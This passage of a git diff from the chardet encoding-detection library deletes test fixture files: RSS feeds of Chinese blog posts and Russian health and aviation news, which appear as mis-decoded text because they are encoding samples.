    ָפ׃׀ַיּ«ֱִֻׁ ֿכ±נֱµׂ׳ֳװח ¾ֻֽדֳװֱµִדµִ׃µ±§ ֱֻֽ¾ֽ÷ֳ
    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    5.7 http://www.blogcn.com/User14/xyl5400/blog/20768874.html ־ֻׂµ²ֳ´÷ֳ
    jing,ִדַ¶װµִ

    ִׁ¹‎µִַ
    ׂ»ײ±µ½ֿײװ־×ײ¹
    ־ׂ»¹װ׳צ׳ֵֽ¬ׁשµֲִ

    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    2¡¢6 http://www.blogcn.com/User14/xyl5400/blog/6144866.html ¡°ײױ׃µ½ִַׂ»ּל־ׂ·¢ֿײ£¬²»ַײ»׃׀־ׂ²ֵֿכµֳֳִַ´ֹמוה¡£ֻש׃׀ָֻ¶¼׃׀׳װ¼÷ׂ»¸צְ½ח¡£ײ»ַ־ׂ¾¹ָ»־·¨´׃ֳַֻµִ־ִ׳ײְן¶ֱ³צְ´¡£׀י־±µְִ½ח±דָח´ֻ־ןײ£¬»עױֻµ£¬־ןײµְִ½ח±״ָ»׀י־±¡£¡± (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]> »¶׃­»״ְ´£¡ http://www.blogcn.com/User14/xyl5400/blog/6033617.html ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]> 01¡¢28 http://www.blogcn.com/User14/xyl5400/blog/5975505.html µֱָֻ÷³₪¡­¡­
    µ«־ֶֻׂ÷ץׁׂ¾­ֱֻֽ·ֵ¼ֱֻׂ×׳צ²ֳ´
    ׳עּל³צָ¥¹הֱֻׂ»ּל
    ְ´ְ´»״»״
    ¿´ױג¸צ׀¡׀¡µִױִײ³ַ
    ½סּלײ»£ֲֿ½ֵֻב÷ֽ¿ױ׀י

    ÷ֳ¾ֳֳ»ְםױג¸צ²©¿ֱֻֽ
    ־ׂ²»ײ×µְ־ׂ׃¦¸ֳ־‏ִִֹׂ»ׁש
    ׃ַ־ׂױ¾װײ׀¼הׂ¡°
    ָ»÷ףֿכ£¬
    ־ׂ׃¦¸ֳַׂ×ַ®
    ¿ֹֿ§ׁ¡ֿמְןֳזֳ»׃׀ַ®
    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    00 http://www.blogcn.com/User14/xyl5400/blog/5748157.html µ±´ף¼ׂ¶¼ׁ¡װסֿײµ
    ־ׂ»¹ֹµֹµֱפװװ­µ״
    wingֻµ½ב¹ׂ»ײ±װµָ´‎
    ¶ר»״ׂהµֳַָָֻ׳µ½ײױµד±װ»״ֽ·¿´ׂ»ׁ
    ױזµִױגׁש
    ִַ־ׂ»¹ױץװת׳ק²ֳ´

    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    °½נ ½סּלַ¥µ® http://www.blogcn.com/User14/xyl5400/blog/5401607.html ־ׂ÷ֳֿסּך¹גֱֻ׳װ¼÷ַ°ֳזׂ»°כµִֽ··¢ׂ»°ד¡£
    ־ׂױ¾װױגְן÷¾ֳ÷¾ֳ¡£ֿכֱֻ÷¾ֳ÷¾ֳ¡£־ׂµִֹתֳ÷¾ֳ÷¾ֳ¡£
    µ«ַ׃׀²ֳ´ׂגׂוִ״£¿

    ַׂע־×־ׂ׀´ֱִַֻׁשµִ־ִױֲֳ´£¿
    ֻשׂװ־ׂװ¥µ®½ֻµ£¬־ַׂױגׁשµִ¡£־ַׂ°½נֵ®¡£
    ױגׁש»ע׀ם¿ֹׂװֿ´ֽׁ־ׂµִ׳ן¶ס¡£

    ¶אֳ´¿ֹ׀¦
    µ±־ׂ·טµפ  ׂ»ַ׀»ב¸÷ֳ¡£ (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ׀¸ִ¹‎÷ף http://www.blogcn.com/User14/xyl5400/blog/5368356.html ׂ»
    ֱ½ִךֱדׂ»¸צ׀ֶַַ°µִֽםֹֿ£¬־ׂװֿ׃׀ָֻײֱµִ½ּׁ§ֲ¥ֲֿ£¬ַבַבµ״÷׳ֵ¸ט¡£¸טֹש÷ֶ®ֳל£¬ֿסְַ´׳װִ³¸צװ¶·½£¬װֳ¿¸צ½ֲַה»״׀‎£¬¸ת׳ֵ÷°׳÷°׳µִװֲ¹גµ´°¡µ´¡£
    ּלֽ¦ְהµִ¡£¥µ®¸ױ¹‎¡£¿ױֶרְן»¹²׀ֱפ׳ֵ÷ל÷לֲֲּּµִֿ²ַל¡£
    ³×ֱֻ÷¾ֳײ®÷ף£¬־ׂ׳×¶ר±³«¡£±³־ׂ¼ָ²»ֿ²»¶ׂ²²»ּײׁבµִ«£¬־ֹֻ´ףֵׁµִ«¡£׳°׳ֵֹ³ֶׁµִֹ₪ׂפ£¬ׁ§׳ֵ°÷ׁןµִ¿ֶר£¬´ף׀¦¡£
    ׳מ÷ףך©ָ»¶רײ¹¡£ְֻׂ»°ד¼ֵ¾²¡£ׂ¹÷³ֱ£¬ׁ¹µֳָֻ´­²»¹‎ֶר¡£
    ־ׂ¿´ֱֻֽץטק÷ֳׂ»»ב¶ש£¬÷ֱ־ױקױ׳µ״¿ֱֻ¡£
    ֽץטק£¬ִדײ×µְֲנ£¬ֳֻֿ±§ֱֻ־ׂ¡£װ¥µ®ׂ¹£¬ֽ»ָ»±§ֱֻ־ׂ¡£¿ֹֿײװֻֻµֿ²»¶־ׂµ«ַ²»°®־ׂ£¬ײ»ֿכ¼ּ׀רµ±ֵף׃ׁ¡£־ׂ£¬־ֻׂµ²ֳ´÷ֳִ״£¿°®ֳִַ´¾ֳµֳִִַ´ׂ»¸צָֻ°¡¡£
    ־ׂ¶װ׳ֵֽץטקא«א«µ״ֻµ¡£־¯ַ¡¢»‎װ¹ײ¹²»׳¡ׂ»׃¿¶ר³צ¡£
    ֽץטק£¬½סּל÷ְה¡£
    ֽץטק£¬½סּלµִװֲ¹גַ²ׂ°׳µִ¡£
    ֽץטק£¬־ׂ°®ֳֿ¡£¿ֹ־ׂױזµִֶ¯²´÷¾ֱֳֻ£¬ׂ»ײ±ׂ»ײ±¡£
    ֽץטק£¬ִד¸זֻ־ׂ£¬ֹסֻ»ב¾ָ־ֲׂנ£¿
    ־ֶׂ½µ­µ״ֻµ׳ֵׂ»׀©÷ֱ־ֽ·׀קµִ»°£¬ׂװ־ו·ײײ׃׳ק־×ֳ¿ֱ½¾ה»°µִ¼ה¸פ¡£װ³ֱ¼ֵµִׂ¹ְן£¬ֳ¿¾ה»°¶¼ֹס¾­ײ°דֽ»״£¡£
    ׳מ÷ףׂ»¾הַ£÷ֽץטק£¬־ׂµֳ»״ָ¥ֹֿ±»־ּׂ׃µפׂ»½°כµִֽם׳װ׀¡£
    ³צֶזֶ½¾²µ״ֻµ£¬·ֲ·נ־ׂ²»װר¿¹‎ׂ»ׁש¡£
    ְבֻ®ֱק¹‎²¢ֳ»׃׀÷¼£¡£־ֻׂשֻµµִ»°ׂ²ׂ»ׁש£¬פֱפֱµ״ֲ‏¿×£¬ֹ¢ָ¥¡£ֳ»ָֻ»בּ‎µ½¡£
    µ±±־ַׂ¶װ׳ְֵ׳·זµִֻֿסֻµµִ¡£
    ־ׂ·¢ִ (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    \ No newline at end of file diff --git a/chardet/tests/IBM855/aif.ru.health.xml b/chardet/tests/IBM855/aif.ru.health.xml deleted file mode 100644 index 33e6767..0000000 --- a/chardet/tests/IBM855/aif.ru.health.xml +++ /dev/null @@ -1,131 +0,0 @@ - - - - - - www.AIF.ru - ¸װו¨בװ¨ו-כ¨בד· ·ף¦ װ· "¡·« פ¦ײבײכם¨" - http://www.aif.ru/online/health - - - ¡·« פ¦ײבײכם¨ - http://www.aif.ru/data/mags/health/button.gif - http://www.aif.ru/online/health - 88 - 31 - - - - ַ ֶ ״¨ב¨י·ום װײכײ¬ײ¦װ װײם - http://www.aif.ru/online/health/592/11_01 - - ױ כ¨בװײ¨, ¨¦·װדוכ¨װװײ¨, כײ וײ ד¨¬ײ¦װ ׂײיװײ כ¨ב·ום ¢¨ףײ¬ײכײבײװײ, ו ֶ קוײ כ וײ, וײ ױײכס½ ¬ײ¦ ײ¢ף ו¨׀םװײ װ דוח״·ו. ױ¨דׂײוב װ· װ  וײ! רוײ װ¨ ״בײדוײ ײ¨ב¨¦װײ½ ״ב ף¦װ·ֶ, קוײ - כ¨µ ! ¡ כ¨µ· כ י·ףװ· ״ב·װוײ ײוׂ¨ ום. ׳וׂ¨ ום ץ·בײֶײ · ¦¨װםֶ  ק¦ ֶ ¦כ -וב·... ¸ כׂ¨דוײ ״בײכײף¬׀ ץ ¨ׂסµ "װײכײ¬ײ ד דום" · "װײכײ¬ײ ף¦ײבײכם" ״ב ף¦װײכ װ·¨ ױײכײ¬ײ ¬ײ¦  ״ב·װײד·ו ׀·¢ײ װײכס¨ ¢ײ׀ֶ·, ׀·¢ײ ײ¢ײדוב¨ו דו בס¨. § ¢ס ״ײדו ב וםד ·ף¢¨י ום ״ײ¦ײ¢װײ¬ײ ×·װ ׀  ׀¢·ׂײ¬ײ ״ב ף¦װ·ֶ , ״ב·כ¨¦ח װ¨דֶײ׀םֶײ "״ב ף¦װ·װסµ" ״ב כ·׀ ף דוײ׀םװײ½ ¢¨ףײ״ דװײדו·. - - - ¸¦·ו¨ כ ¢ װ! - http://www.aif.ru/online/health/592/03_01 - - רוײ ׂײיװײ ¦¨׀ ום כ ײ״·׀ֶ µ, כ ׂ¨ץֶ¨ ד ¢¨ב¨ףײכסׂ· ׀·דוםׂ· ·׀· ד¨װײׂ.  ב·וםד ׂײיװײ, ¦ י¨ ף בסכץ·דם כ ״¨דײֶ. ַ ֶ ״ב כ·׀םװײ µײ¦·ום כ ¢ װ, װ ׂ ב דדֶ ףסכ ¨ו כב -×·ף·ײו¨ב ״¨כו ײו¦¨׀¨װ· ¢ ׀םװ¨ײ׀ײ¬·· ׂ¨¦·₪·װדֶײ¬ײ ₪¨װוב  "­חו -ַ׀·װ·ֶ" ׀· ¡גז¡׃׳ױ׳ל¡. - - - ׳ ¨ׂ ב דדֶ י¨ו ב¨ ֶ₪· ׂ װוח - http://www.aif.ru/online/health/592/05_01 - - ג¨ ֶ₪· ׃ װוח - קוײ וח¢¨בֶח׀·װײכ  ״בײ¢ . §׀ ֶ ֶײ½ ₪¨׀· ײװ  ·ףװ  ׀םװײ ״ב¨¦װ ףװ  ׀ דם? "ג¨ ֶ₪· ׃ װוח - קוײ ײוכ¨ו ֶ׀¨וײװײ¬ײ ·ׂׂחװ·ו¨ו  ֶ ֶ ¬·״¨בחכדוכ·ו¨׀םװײדו· ף ׂ¨¦׀¨װװײ¬ײ ו·״  װ  ד¨װד·¢·׀·ף ₪· ײב¬ װ·ףׂ  ׂ·ֶײ¢ ֶו¨ב·ׂ· וח¢¨בֶח׀¨ף . ב¨¦װ ףװ ¨װ  ײװ  ¦׀ כסכ׀¨װ· כ ײב¬ װ·ףׂ¨ כײף¢ח¦·ו¨׀ וח¢¨בֶח׀¨ף ". (ַײׂ·ו¨ו ״ײ ֶ׀¨וײװײׂח ·ׂׂחװ·ו¨וח · חדוײ½·כײדו· ֶ ·װרֶ₪··, ל׳פ, 1965, 1970 ¬¬.) ¨בכ  כדוב¨  ד ׂ·ֶײ¢ ֶו¨ב·ׂ· וח¢¨בֶח׀¨ף  כ גײדד·· װ כףסכ ¨וד ·דֶחדדוכ¨װװײ (!) · ׂ דדײכײ כ בײ¦¦ײׂ µ. - - - ה 3 ¦ײ 7 ׀¨ו. ג דו·ׂ ץ¨כ¨׀בח - http://www.aif.ru/online/health/592/06_01 - - "׃ײ¨½ ¦¨כײֶ¨ דֶײבײ 5 ׀¨ו. ©½ חי¨ ¢ װו·ֶ· װײד·ום µײ¨וד, װײ µכײדו·ֶ· ¦¨׀ ום װ¨ ·ף ¨¬ײ. ײ¦דֶ י·ו¨, כ ¨ׂ ׂײי¨ו ¢סום ״ב··װ  · ֶ ֶ·¨ דב¨¦דוכ  ׂײ¬חו ״ײׂײם?" -׃. ׃ ¨ װ · ֶ ײ כ  , ַײדובײׂ  - - - ה 7 ¦ײ 12 ׀¨ו. ¶ײ׀ײ¦·׀םװ·ֶ װ  ֶ׀ - http://www.aif.ru/online/health/592/06_02 - - "׃ײיװײ ׀· ײ״ב¨¦¨׀·ום, ·דו·װװײ¨ ח ב¨¢¨װֶ  ײי·ב¨װ·¨ ·׀· ײװ ״¨ב¨¨¦ ¨ו?" -ז. ¡ כ ¨ ב · װ  , ©ֶ ו¨ב·װ¢חב¬ - - - ה 12 ¦ײ 16 ׀¨ו. ׳״ דװ  ׂײ¦  - http://www.aif.ru/online/health/592/06_03 - - "הֶ י·ו¨, װ דֶײ׀םֶײ ײ״ דװײ µײ¦·ום ף·ׂײ½ ד ײוֶבסוסׂ י·כײוײׂ. ׃ײ ¦ײם ¬ײכײב·ו, וײ ײװ  כד¨ ״ב·ֶבסכ ¨ו ֶחבוֶײ½, װײ כד¨ ב כװײ י¨ µײ׀ײ¦װײ... §ײֶ ף ום ¨½ וײ-׀·¢ײ װ¨כײףׂײיװײ." -ל. ג., זײ׀םוו· - - - ב כ·׀  ¦׀ י¨׀ח¦ֶ  - http://www.aif.ru/online/health/592/07_01 - - ׃װײ¬·¨ ״¨ב·ײ¦·¨דֶ· דוב ¦ ו ײו װ¨דכ ב¨װ· י¨׀ח¦ֶ , דײ״בײכײי¦ ש¨¬ײד ¢ײ׀¨כסׂ· ײשחש¨װ·ׂ·. ב··װ  קוײ¬ײ ף ֶ׀ ¨וד װ¨ וײ׀םֶײ כ וײׂ, וײ ׀¦· ¨¦ו װ¨ וײ, וײ װ ¦ײ, װײ · װ¨ ו ֶ, ֶ ֶ װ ¦ײ, · ¢ײ׀םץ¨, ¨ׂ װ ¦ײ. ׳דײ¢¨װװײ  דוײ ו ֶ  ״בײ¢׀¨ׂ  כײףװ·ֶ ¨ו ״ײד׀¨ ״ב ף¦װ·װסµ ף דוײ׀·½. וײ¢ס װ¨ ¦ײכײ¦·ום י¨׀ח¦ײֶ ¦ײ ו ֶײ¬ײ דײדוײװ·, ״ײׂװ·ו¨ װ¨דֶײ׀םֶײ ״בײכ¨ב¨װװסµ כב¨ׂ¨װ¨ׂ ״ב כ·׀. - - - ױ דוח״׀¨װ·¨ װ   װ¬·װח - http://www.aif.ru/online/health/592/08_01 - - ַ ײ¦װײׂח ·ף װ ·¢ײ׀¨¨ ב ד״בײדוב װ¨װװסµ ״בײדוח¦װסµ ף ¢ײ׀¨כ װ·½ ײוװײד·וד  װ¬·װ , ·׀· ײדובס½ וײװף·׀׀·ו. רוײׂח ײדובײׂח ·װרֶ₪·ײװװײׂח ף ¢ײ׀¨כ װ· ד ״ײב י¨װ·¨ׂ ׂ·װ¦ ׀·װ (¬׀ װ¦) ״ײ¦כ¨בי¨װס ֶ ֶ ¦¨ו·, ו ֶ · כףבײד׀ס¨.  ש¨ כד¨¬ײ  װ¬·װ  כײףװ·ֶ ¨ו ·ף-ף  ״¨ב¨ײµ׀ י¦¨װ· ו¨׀  ·׀· ײו¦¨׀םװסµ ¨¬ײ  דו¨½, ײדײ¢¨װװײ װײ¬, װ  ×ײװ¨ דװ·י¨װ· ·ׂׂחװװײ½ ף ש·וס ײב¬ װ·ףׂ , ״ב· װ¨ֶ ׀ײב·½װײׂ ״·ו װ··, µבײװ·¨דֶײׂ דוב¨דד¨, ״¨ב¨חוײׂ׀¨װ··, װ¨¦ײדס״ װ··. - - - לװ·ׂ װ·¨ װ  ״ײףכײװײװ·ֶ - http://www.aif.ru/online/health/592/10_01 - - ׳דו¨ײµײװ¦בײף - ¦ײכײ׀םװײ ב ד״בײדוב װ¨װװײ¨ ף ¢ײ׀¨כ װ·¨, ֶײוײבײ¨ ב ףכ·כ ¨וד ח ׀¦¨½ ׀¢ײ¬ײ כײףב דו . ב·¨ׂ כ ״ײד׀¨¦װ¨¨ כב¨ׂ כ דכף· ד ׂ ׀ײ״ײ¦כ·יװסׂ ײ¢ב ףײׂ י·ףװ· · ׂװײ¬ײ דײכסׂ ד·¦¨װ·¨ׂ ף  ֶײׂ״םו¨בײׂ ײװ ף ׂ¨וװײ ״ײׂײ׀ײ¦¨׀. ַ ֶ ״ײֶ ף ׀· ·דד׀¨¦ײכ װ·, ״בײכ¨¦¨װװס¨ כ ¸װדו·וחו¨ װ וחבײ״ ו··, כ ״בײ×·׀ ֶו·ֶ¨ ײדו¨ײµײװ¦בײף  װ ·¢ײ׀םץ·½ ק×רֶו ײֶ ףסכ ו ׂ דד י, ׀¨¨¢װ  ¬·ׂװ דו·ֶ , ד ׂײכסוי¨װ·¨ ץ¨· · ״ײףכײװײװ·ֶ , ¦·¨ו  · ×·וײו¨ב ״·. - - - ױ¨ ד׀·ץֶײׂ ׀· י·בװײ? - http://www.aif.ru/online/health/592/11_02 - - לס¢·ב  װ ·¢ײ׀¨¨ ״ײ¦µײ¦ש·¨ ¦׀ כ ד כ ב· װוס ײוכ¨וײכ װ  ֶ י¦ס½ ·ף כײ״בײדײכ קוײ¬ײ ו¨דו , כס דׂײי¨ו¨ כ ¦ײדו וײװײ½ דו¨״¨װ· ײ¢¨ֶו·כװײ ײ״ב¨¦¨׀·ום -   װ¨ "״¨ב¨¢ בש·כ ¨ו¨" ׀· כס כ דכײ¨ׂ ״·ש¨כײׂ ב ₪·ײװ¨ ד י·ב ׂ·? - - - ¸ף׀¨·ׂ ׀·  ׀ֶײ¬ײ׀·ףׂ? - http://www.aif.ru/online/health/592/12_01 - - "ַ ֶ · ¦׀ ¨¬ײ ׀¦· דײף¦ ו ד¨¢¨ ¢ײ׀¨ףװ· · ״בײ¢׀¨ׂס? ַ ֶ ״ײׂײם ׀¦ׂ ·ףׂ¨װ·ום דכײ י·ףװם? ¸ ֶ ֶ ד¦¨׀ ום י·ףװם ¨׀ײכ¨ֶ  ף¦ײבײכײ½, ד·׀םװײ½ · ד דו׀·כײ½?" ב ֶו·ֶחש·½ ״ד·µײו¨ב ״¨כו, ״ד·µײ׀ײ¬ · ¬ײׂ¨ײ״ ו ל ׀¨ב·½ ה¸ױ©ׁמױ¸ַ׳ל ״סו ¨וד װ ½ו· ײוכ¨וס װ  קו· כײ״בײדס... ה¨¬ײ¦װ ׂס ״ח¢׀·ֶח¨ׂ ¬׀ כח ·ף ֶװ·¬· "ז ½װס ״ײ¦דײףװ װ·", כ ֶײוײבײ½ ¦ײֶוײב ה·װ¨׀םװ·ֶײכ ״ײׂײ¬ ¨ו ״ײװום ״ב··װס ו ֶײ½ ¢¨¦ס, ֶ ֶ  ׀ֶײ¬ײ׀·ףׂ, · ״ײֶ ףסכ ¨ו ״חום ·ף¢ כ׀¨װ· ײו קוײ½ ¢ײ׀¨ףװ·. - - - §·¨וײ׀ײ¬· כ כײ״בײד µ · ײוכ¨ו µ - http://www.aif.ru/online/health/592/14_01 - - ה¨¬ײ¦װ װ  כײ״בײדס ·ו ו¨׀¨½ ײוכ¨ ¨ו כב -¦·¨וײ׀ײ¬, ¦ײֶוײב ׂ¨¦·₪·װדֶ·µ װ חֶ ׃·µ ·׀ ­¸ױפ£טג­. - - - פ ֶ ׀¨ׂ ¬ײב׀ײ - http://www.aif.ru/online/health/592/15_01 - - ל <a href="http://www.aif.ru/online/health/591/04_01">״ב¨¦ס¦חש¨ׂ װײׂ¨ב¨</a> ׂס ב דדֶ ף ׀· ײ וײׂ, ֶ ֶ ״ײכסד·ום חדוײ½·כײדום ֶ µײ׀ײ¦ח כײף¦חµײ״בײכײ¦ש·µ ״חו¨½ װײד , ֶ ֶ װחיװײ ״ב כ·׀םװײ ¦סץ ום װ  ׂײבײף¨. ¡ ו¨״¨בם - װ¨דֶײ׀םֶײ דײכ¨וײכ, ֶ ֶ ף ֶ ׀·ום ¬ײב׀ײ. - - - הװ·ׂ ¨ׂ חוײׂ׀¨װ·¨ - http://www.aif.ru/online/health/592/16_02 - - "׃¨װ ײ¨װם חוײׂ׀ו װ¨ וײ׀םֶײ ¦׀·ו¨׀םװס¨ ״ײ¨ף¦ֶ· כ  כוײׂײ¢·׀¨, װײ · ¦ײ׀¬·¨ ד·¦¨װ· װ  ב ף׀·װײ¬ײ בײ¦  דײכ¨ש װ·µ · דײ¢ב װ·µ. ¸ ¨ש¨ ¢¨ד״ײֶײ·ו ײ¢ש¨¨ · װ¨בכװײ¨ װ ״בי¨װ·¨,   כ ״ײד׀¨¦װ¨¨ כב¨ׂ - ¦ י¨ ¬ײ׀ײכװס¨ ¢ײ׀·. וײ ׂװ¨ ׂײי¨ו ״ײׂײם?" -¸¬ײבם ה ײ ׂ ײ כ, ׃ײדֶכ  - - - לף¦ח׀ד י·כײו - http://www.aif.ru/online/health/592/16_04 - - "וײ ״ײׂײי¨ו ״ב· כף¦חו·· י·כײו ? ¨ׂ װ ¦ײ ״·ו וםד?" -©ֶ ו¨ב·װ  ׃., ׳ב¨׀ - - - ׃ײיװײ ׀· ״¨ב¨¨דום כ·ו ׂ·װײכ? - http://www.aif.ru/online/health/592/16_06 - - "׳ד¨װם · ף·ׂײ½ ב¨ֶײׂ¨װ¦חו ״·ום ¢ײ׀םץ¨ כ·ו ׂ·װײכ. הֶ י·ו¨,   ֶ ¨ׂח ׂײי¨ו ״ב·כ¨דו· ·µ ״¨ב¨·ף¢סוײֶ?" -ל. ל ¨ ׀ · ֶ ײ כ, «בף¨כײ - - - ג ¢ײו  װ ¦ ײ¢ב ףײׂ - http://www.aif.ru/online/health/592/10_02 - - ױ כ¨בװײ¨, װ¨ו ו ֶײ½ י¨װש·װס, ֶײוײב  װ¨ µײו¨׀  ¢ס µײבײץײ כס¬׀¦¨ום. ׳דײ¢¨װװײ µײ¨וד ״ײב ¢ײו ום װ ¦ דכײ·ׂ ײ¢ב ףײׂ ״¨ב¨¦ ״ב ף¦װ·ֶײׂ. ױ דוײש¨½ ״ ׀ײֶײ½-כסבח ׀ײֶײ½ דו װחו ׂ דֶ· ·ף װ וחב ׀םװסµ ״בײ¦חֶוײכ. - - - - diff --git a/chardet/tests/IBM855/aug32.hole.ru.xml b/chardet/tests/IBM855/aug32.hole.ru.xml deleted file mode 100644 index c10a39c..0000000 --- a/chardet/tests/IBM855/aug32.hole.ru.xml +++ /dev/null @@ -1,18 +0,0 @@ - - - - - ¡×·ץ  ז¡ "32-¨ ¡כ¬חדו " - http://aug32.hole.ru/ - ¡×·ץ  ז¡ "32-¨ ¡כ¬חדו " - - - 18.01.06 - <b>§©«©ַזע ג©¸</b>. הײ׀םװס½ ֶײװ₪¨בו.<BR><I>ה װֶו ¨ו¨ב¢חב¬. ַײװ₪¨בוװס½ ף ׀ ֶװ·יװײ¬ײ ׂ ¬ ף·װ  "£חֶכײ¨¦". ױ  ״׀. לײדדו װ·.</I> - http://aug32.hole.ru/afisha.htm - - - diff --git a/chardet/tests/IBM855/aviaport.ru.xml b/chardet/tests/IBM855/aviaport.ru.xml deleted file mode 100644 index c8dffac..0000000 --- a/chardet/tests/IBM855/aviaport.ru.xml +++ /dev/null @@ -1,221 +0,0 @@ - - - - - - ¡כ· ײבו.Ru - http://www.aviaport.ru - ¡כ· ₪· ·µ ״¨בכסµ בחֶ - - http://www.aviaport.ru/images/aviaport_logo_yandex.gif - ¡כ· ײבו.Ru - http://www.aviaport.ru - - - - ױ ½¦¨װס ו¨׀  ¦כחµ ״ײ¬·¢ץ·µ כ  כ· ֶ ו דובײר ״ײ¦ ¶ בםֶײכײׂ - http://www.aviaport.ru/news/2006/01/02/99278.html - ױ  ו¨בב·וײב·· טֶב ·װס ב ף¢·׀ד ד ׂײ׀¨ו ד וב¨ׂ ׀¨װ ׂ· קֶ·״ י , כס׀¨ו¨כץ·½ ·ף ׃ײדֶכס. ז¨׀  ¦כחµ ״ײ¬·¢ץ·µ ״ײ¦װוס ·ף ײף¨ב  ַײׂדײׂײ׀םדֶײ¨, ֶח¦  ח״ ׀ ד ׂײ׀¨ו - Mon, 02 Jan 2006 17:25:00 +0300 - ױ  ו¨בב·וײב·· טֶב ·װס ב ף¢·׀ד ד ׂײ׀¨ו ד וב¨ׂ ׀¨װ ׂ· קֶ·״ י , כס׀¨ו¨כץ·½ ·ף ׃ײדֶכס. ז¨׀  ¦כחµ ״ײ¬·¢ץ·µ ״ײ¦װוס ·ף ײף¨ב  ַײׂדײׂײ׀םדֶײ¨, ֶח¦  ח״ ׀ ד ׂײ׀¨ו. ַ ֶ דײײ¢ש ¨ו ֶײבב¨ד״ײװ¦¨װו  ¬¨װודוכ  "¸װו¨ב× ֶד-טֶב ·װ ", ״ײ ״ב¨¦כ ב·ו¨׀םװסׂ ¦ װװסׂ, קוײ ו¨׀  דו ב¦¨דדס · ײ¦װײ¬ײ ·ף ״·׀ײוײכ. §׀ ״ײ¦¨ׂ  ד ׂײ׀¨ו  ײי·¦ ו ״ב·¢סו·¨ בײדד·½דֶ·µ ד״¨₪· ׀·דוײכ. ַ ֶ דײײ¢ש·׀· "¸װו¨ב× ֶדח" כ ״ב¨דד-ד׀חי¢¨ ׃ה ג«, כ ״ײװ¨¦¨׀םװ·ֶ כ 11:16 ׃הַ ב¨ ֶו·כװס½ ד ׂײ׀¨ו ¢·ףװ¨ד ֶ׀ דד  £ ¨-125, כס׀¨ו¨כץ·½ ·ף "צ¨ב¨ׂ¨ום¨כײ-1", ח״ ׀ כ 3-4 ֶ·׀ײׂ¨וב µ װ¨¦ ׀¨ֶײ ײו  קבײ״ײבו  ¶ בםֶײכ . ל ׃ה ¦ײ¢ כ·׀·, וײ ׀¨װס קֶ·״ י  - ¬ב י¦ װ¨ גײדד··. ה ׂײ׀¨ו ף ב¨¬·דוב·בײכ װ כ ײדובײכװײׂ ¬ײדח¦ בדוכ¨ ¡בח¢ . ¸ף ¶ בםֶײכ  ײװ ¦ײ׀י¨װ ¢ס׀ ¦ײדו כ·ום וחב·דוײכ כ ¡׀ם״ס. ַ ״ײ·דֶײכסׂ ב ¢ײו ׂ ״ב·כ׀¨¨װס װ ף¨ׂװ  ״ײ·דֶײכ  ¬בח״״   קבײ״ײבו  "¶ בםֶײכ", ״ײ¦ב ף¦¨׀¨װ·¨ ײ״¨ב ו·כװײ-ד״ ד ו¨׀םװײ½ ד׀חי¢ס ­ט ׃·װה כ ¶ בםֶײכדֶײ½ ײ¢׀ דו·, כײ¦ײ׀ ףס. ַײײב¦·װ ₪· ״ײ·דֶײכײ-ד״ ד ו¨׀םװסµ ב ¢ײו דײכ¨בץ ¨ו ¶ בםֶײכדֶ·½ ב¨¬·ײװ ׀םװס½ ֶײײב¦·װ ₪·ײװװס½ ₪¨װוב ­ײדח¦ בדוכ¨װװײ½  כ· ₪·ײװװײ½ ״ײ·דֶײכײ-ד״ ד ו¨׀םװײ½ ד׀חי¢ס ׃·װה טֶב ·װס. - - - - - ײוײֶ ״ דד י·בײכ ¨ב¨ף  קבײ״ײבו ·ׂ¨װ· £¨װ-­חב·ײװ  כסבײד װ  11% - http://www.aviaport.ru/news/2006/01/02/99277.html - ל 2005-ׂ ¬ײ¦ח ¨ב¨ף  קבײ״ײבו ·ׂ¨װ· £¨װ-­חב·ײװ  ״בײץ׀· ״ב·ׂ¨בװײ 8,7 ׂ·׀׀·ײװײכ ״ דד י·בײכ ׂ¨י¦חװ בײ¦װסµ · װ ₪·ײװ ׀םװסµ  כ· ׀·װ·½. ב·בײדו ״ײ דב כװ¨װ· ד 2004 ¬ײ¦ײׂ דײדו כ·׀ ײֶײ׀ײ 11% - Mon, 02 Jan 2006 13:29:00 +0300 - ל ד¨¬ײ¦װץװ¨ׂ װײׂ¨ב¨ The Marker (קֶײװײׂ·¨דֶײ¨ ״ב·׀ײי¨װ·¨ ֶ ¬ ף¨ו¨ "­  ב¨₪") ¢ס׀· ײ״ח¢׀·ֶײכ װס ¦ װװס¨ ײ בײדו¨ ״ײוײֶ  ״ דד י·בײכ ¨ב¨ף  קבײ״ײבו ·ׂ¨װ· § כ·¦  £¨װ-­חב·ײװ .הײ¬׀ דװײ דכ¨¦¨װ·ׂ, ״ב¨¦ײדו כ׀¨װװסׂ  ¦ׂ·װ·דוב ₪·¨½  קבײ״ײבו , כ 2005-ׂ ¬ײ¦ח ¨ב¨ף  קבײ״ײבו ·ׂ¨װ· £¨װ-­חב·ײװ  ״בײץ׀· ״ב·ׂ¨בװײ 8,7 ׂ·׀׀·ײװײכ ״ דד י·בײכ ׂ¨י¦חװ בײ¦װסµ · װ ₪·ײװ ׀םװסµ  כ· ׀·װ·½. ב·בײדו ״ײ דב כװ¨װ· ד 2004 ¬ײ¦ײׂ דײדו כ·׀ ײֶײ׀ײ 11%. ב·בײדו װ  ׂ¨י¦חװ בײ¦װסµ  כ· ׀·װ·µ דײדו כ·׀ ״ב·ׂ¨בװײ 5,3% ״ײ דב כװ¨װ· ד ״בײץ׀סׂ ¬ײ¦ײׂ.The Marker ״ח¢׀·ֶח¨ו ¦ װװס¨ ף  וב· װ¨¦¨׀· ·ף י·ףװ·  קבײ״ײבו : 1-21 ¦¨ֶ ¢ב  קבײ״ײבו ״ב·װ׀ ״ב·ׂ¨בװײ 360,7 וסד ״ דד י·בײכ, וײ װ  1,4% כסץ¨ ״בײץ׀ײ¬ײ¦װ¨¬ײ ״ײֶ ף ו¨׀ ף   װ ׀ײ¬·װס½ ״¨ב·ײ¦. ·ד׀ײ ״ב·¢סכץ·µ ״ דד י·בײכ ׂ¨י¦חװ בײ¦װסµ  כ· ׀·װ·½ דײדו כ·׀ײ ״ב·ׂ¨בװײ 176 וסד (״ב·בײדו װ  0,7%), ·ד׀ײ 